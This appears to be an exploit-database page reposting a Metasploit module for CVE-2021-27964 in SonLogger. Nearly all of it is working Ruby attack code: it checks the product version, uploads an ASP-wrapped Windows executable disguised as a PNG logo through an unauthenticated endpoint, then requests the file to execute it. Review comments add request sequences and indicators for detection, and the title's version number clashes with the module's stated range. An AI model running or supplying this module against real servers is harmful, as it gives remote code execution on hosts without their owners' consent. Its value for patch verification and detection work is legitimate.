





SonLogger 4.2.3.3 Shell Upload

CVE Category Price Severity
CVE-2021-27964 CWE-XX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-16
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:L/I:L/A:N 0.02192 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030095

Below is a copy:

SonLogger 4.2.3.3 Shell Upload
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for an arbitrary file upload in SonLogger
# (CVE-2021-27964). By the module's own metadata and version check, releases
# below 6.4.1 are treated as affected, so running 6.4.1 or later is the
# remediation this file implies.
#
# Request sequence issued by this file, in order (useful for log review and
# detection rules; <base> is TARGETURI, default "/", port default 5000):
#   1. POST <base>/shared/GetProductInfo                    (version check)
#   2. POST <base>/Config/SaveUploadedHotspotLogoFile       (multipart upload)
#   3. GET  <base>/Assets/temp/hotspot/img/logohotspot.asp  (requests the upload)
# No request built in this file sets credentials or a session cookie.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability rank declared by the module author.
  Rank = NormalRanking

  # Payload-to-executable helpers; create_payload calls generate_payload_exe.
  include Msf::Exploit::EXE
  # Framework mixin that runs #check ahead of #exploit.
  prepend Msf::Exploit::Remote::AutoCheck
  # HTTP helpers used throughout: send_request_cgi, normalize_uri, target_uri.
  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): mixed in, but nothing in this file registers the uploaded
  # file for cleanup, so the uploaded .asp is expected to stay on disk after a
  # run. Responders should look for it at the path requested in #exploit.
  include Msf::Exploit::FileDropper

  # Declares the module metadata (name, references, platform, targets) and the
  # user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload
          via insecure POST request. It has been tested on version < 6.4.1 in
          Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module
          ],
        'References' =>
          [
            ['CVE', '2021-27964'],
            ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
          ],

        # Windows-only target; the author declares the resulting session as
        # not privileged.
        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' =>
          [
            [
              'SonLogger < 6.4.1',
              {
                'Platform' => 'win'
              }
            ],
          ],
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        # Default port and base path the module assumes for the SonLogger web UI.
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
      ]
    )
  end

  # Sends an empty-body POST to the GetProductInfo endpoint with browser-style
  # AJAX headers and returns whatever send_request_cgi returns.
  #
  # @return the HTTP response, or a falsy value when no response arrived
  #   (the caller in #check treats a falsy result as "unreachable")
  def check_product_info
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
  end

  # Version-based check: reads the 'Version' field of the JSON returned by
  # GetProductInfo and compares it against 6.4.1. Nothing is uploaded here.
  #
  # @return a CheckCode: Unknown (no response or non-200), Vulnerable
  #   (version < 6.4.1) or Safe (version >= 6.4.1)
  def check
    begin
      res = check_product_info

      unless res
        return CheckCode::Unknown('Target is unreachable.')
      end

      unless res.code == 200
        return CheckCode::Unknown("Unexpected server response: #{res.code}")
      end

      # NOTE(review): if the JSON has no 'Version' key this passes nil to
      # Gem::Version.new; how that is handled depends on the RubyGems version
      # in use, so a missing field may not be reported as Unknown. Confirm
      # before relying on this result.
      version = Gem::Version.new(JSON.parse(res.body)['Version'])

      if version < Gem::Version.new('6.4.1')
        CheckCode::Vulnerable("SonLogger version #{version}")
      else
        CheckCode::Safe("SonLogger version #{version}")
      end
    rescue JSON::ParserError
      # NOTE(review): a non-JSON body aborts via fail_with instead of returning
      # a CheckCode, unlike the other failure paths above.
      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
    end
  end

  # Wraps the generated Windows executable in an ASP page and returns it as a
  # String; this is the content uploaded by #exploit.
  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  # Uploads the ASP payload through the hotspot-logo upload endpoint, then
  # requests the stored file so the server executes it.
  #
  # Aborts through fail_with when the upload gets no response, a non-200
  # status, an unparseable body, or the message 'Error in saving file'.
  def exploit
    begin
      print_good('Generate Payload')
      data = create_payload

      # Hand-built multipart body with a single part named "file".
      # Observable traits of this request as written here:
      #   - browser-like "----WebKitFormBoundary" prefix with a random suffix
      #   - random alphanumeric filename with an .asp extension
      #   - part Content-Type declared as image/png although the content is ASP
      #     (extension/MIME mismatch on a logo-upload endpoint)
      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
      post_data = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
      post_data << "Content-Type: image/png\r\n"
      post_data << "\r\n#{data}\r\n"
      # The body ends with an ordinary delimiter line, not the "--boundary--"
      # closing form; requests from this module can be recognised by that.
      post_data << "--#{boundary}\r\n"

      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'data' => post_data,
        'headers' => {
          'Accept' => 'application/json',
          'Accept-Language' => 'en-US,en;q=0.5',
          'X-Requested-With' => 'XMLHttpRequest'
        }
      )
      unless res
        fail_with(Failure::Unreachable, 'No response from server')
      end

      unless res.code == 200
        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
      end

      # A body that is not JSON is folded into nil and handled as a failed
      # upload just below.
      json_res = begin
        JSON.parse(res.body)
      rescue JSON::ParserError
        nil
      end

      if json_res.nil? || json_res['Message'] == 'Error in saving file'
        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
      end

      print_good('Payload has been uploaded')

      handler

      print_status('Executing payload...')
      # The requested path is fixed and does not use the random upload filename,
      # so the server presumably stores the upload as logohotspot.asp under its
      # web root. An .asp file at this location, or any GET for it, is a strong
      # indicator on an affected host. The trailing 5 is the timeout argument
      # passed to send_request_cgi.
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
        'method' => 'GET'
      }, 5)
    end
  # NOTE(review): this method-level rescue covers the whole body, so it
  # presumably also catches what the earlier fail_with calls raise and replaces
  # their specific reason with this generic message. Verify against the
  # framework's exception hierarchy.
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
  end
end
            
